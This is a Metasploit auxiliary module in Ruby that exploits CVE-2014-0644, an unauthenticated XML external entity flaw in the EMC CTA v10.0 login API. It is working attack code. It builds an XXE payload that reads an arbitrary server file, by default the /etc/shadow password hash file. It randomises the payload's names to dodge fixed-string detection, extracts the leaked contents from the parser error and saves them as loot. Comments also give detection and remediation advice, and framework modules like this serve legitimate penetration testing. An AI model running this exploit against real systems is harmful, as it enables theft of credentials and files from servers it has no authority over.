Path: blob/master/modules/auxiliary/gather/emc_cta_xxe.rb
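##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Auxiliary module for CVE-2014-0644: the EMC CTA v10.0 login API parses a
# client-supplied XML document with external entity resolution enabled, so a
# DTD-declared SYSTEM entity is expanded server-side and its contents are
# echoed back in a parser error message.
#
# Defensive notes (for anyone reading this to write detections or remediate):
# - The request is a POST to <TARGETURI>/api/login whose body carries a
#   <!DOCTYPE ...> with an <!ENTITY ... SYSTEM "file://..."> declaration; a
#   DOCTYPE/ENTITY declaration in a login request is never legitimate for this
#   endpoint and is a high-signal detection for this class of attack.
# - The leak is a verbose parser error ("For input string: ...") that reflects
#   the expanded entity. Disabling DTD/external-entity resolution in the XML
#   parser and suppressing raw parser errors in responses removes both halves.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  # Registers module metadata and datastore options.
  #
  # @param info [Hash] metadata merged by the framework via update_info.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'EMC CTA v10.0 Unauthenticated XXE Arbitrary File Read',
        'Description' => %q{
          EMC CTA v10.0 is susceptible to an unauthenticated XXE attack
          that allows an attacker to read arbitrary files from the file system
          with the permissions of the root user.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Brandon Perry <bperry.volatile[at]gmail.com>', # metasploit module
        ],
        'References' => [
          ['CVE', '2014-0644'],
          ['EDB', '32623']
        ],
        'DisclosureDate' => '2014-03-31',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(443),
        OptBool.new('SSL', [true, 'Use SSL', true]),
        OptString.new('TARGETURI', [true, 'Base directory path', '/']),
        OptString.new('FILEPATH', [true, 'The filepath to read on the server', '/etc/shadow'])
      ]
    )
  end

  # Sends one login request carrying the external-entity DTD, extracts the
  # reflected file contents from the server's parser error, and stores them
  # as loot.
  #
  # @raise [Msf::Exploit::Failed] via fail_with when the server does not
  #   answer, or when the response does not contain the expected error text
  #   (e.g. the target is not vulnerable, the file is unreadable, or its
  #   contents did not survive the parser's string handling).
  def run
    # Random DTD names so the request body is not trivially fingerprintable
    # by fixed strings; the DOCTYPE/ENTITY structure itself is unchanged.
    doctype = Rex::Text.rand_text_alpha(6)
    element = Rex::Text.rand_text_alpha(6)
    entity = Rex::Text.rand_text_alpha(6)

    pay = <<~XML
      <?xml version="1.0" encoding="ISO-8859-1"?>
      <!DOCTYPE #{doctype} [
      <!ELEMENT #{element} ANY >
      <!ENTITY #{entity} SYSTEM "file://#{datastore['FILEPATH']}" >]>
      <Request>
      <Username>root</Username>
      <Password>&#{entity};</Password>
      </Request>
    XML

    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'api', 'login'),
      'method' => 'POST',
      'data' => pay
    )

    # A nil response (timeout/connection failure) or a response without a
    # body gives us nothing to parse.
    fail_with(Failure::UnexpectedReply, 'Server did not respond in an expected way') unless res&.body

    # The expanded entity is reflected inside the parser's error message;
    # /m lets the capture span multi-line file contents.
    match = /For input string: "(.*)"/m.match(res.body)
    fail_with(Failure::UnexpectedReply, "File was unretrievable. \nWas it a binary file?") unless match

    contents = match[1]

    path = store_loot('emc.file', 'text/plain', datastore['RHOST'], contents, datastore['FILEPATH'])

    print_good("File saved to: #{path}")
  end
end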